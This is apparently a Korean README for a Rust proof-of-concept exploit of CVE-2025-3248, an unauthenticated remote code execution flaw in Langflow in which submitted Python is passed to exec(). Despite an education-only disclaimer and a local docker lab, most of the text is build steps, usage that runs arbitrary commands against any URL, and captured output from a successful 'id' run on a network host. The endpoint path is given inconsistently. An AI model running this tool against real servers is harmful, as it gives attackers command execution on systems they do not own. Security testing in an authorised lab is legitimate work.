
⚠️ 면책 조항
이 코드는 교육 및 연구 목적으로만 사용해야 합니다. 명시적 허가 없이 시스템에 무단 사용하는 것은 법률 위반이 될 수 있습니다.
저자는 이 도구의 오용 또는 악의적인 활동에 대해 책임을 지지 않습니다.
CVE-2025-3248 - 치명적(Critical)
CVSS 점수: 9.8 | EPSS 점수: 92.57% | 게시일: 2025년 5월 22일
/api/v1/validate/code 엔드포인트는 검증되지 않은 Python 코드를 허용하고 이를 exec()로 직접 실행하며, 인증이 필요하지 않습니다.
# langflow/api/builder/execute.py
exec(code) # No input validation or sandboxing!
Langflow는 /api/v1/builder/execute_code 엔드포인트를 노출하며, 사용자가 제공한 Python 코드를 백엔드에서 exec()로 직접 전달합니다. 인증이나 샌드박싱이 없기 때문에 공격자는 코드 실행을 위한 임의의 페이로드를 제작할 수 있습니다.
# Clone repository
git clone <repo-url>
cd CVE-2025-3248-POC
cargo build --release
# ./target/release/CVE-2025-3248-POC
./CVE-2025-3248-POC --url <BASE_URL> --command "<COMMAND>"
❯ ./target/release/CVE-2025-3248-POC --url 'http://192.168.159.137:7860' --command 'id'
[+] Langflow RCE Exploit - CVE-2025-3248
[+] url :http://192.168.159.137:7860,
[+] Command: id
Status: 200 OK
uid=1000(user) gid=0(root) groups=0(root)
> cd lab
> sudo docker-compose up -d
> ./target/release/CVE-2025-3248-POC --url 'http://localhost:7860' --command 'whoami'
> sudo docker-compose down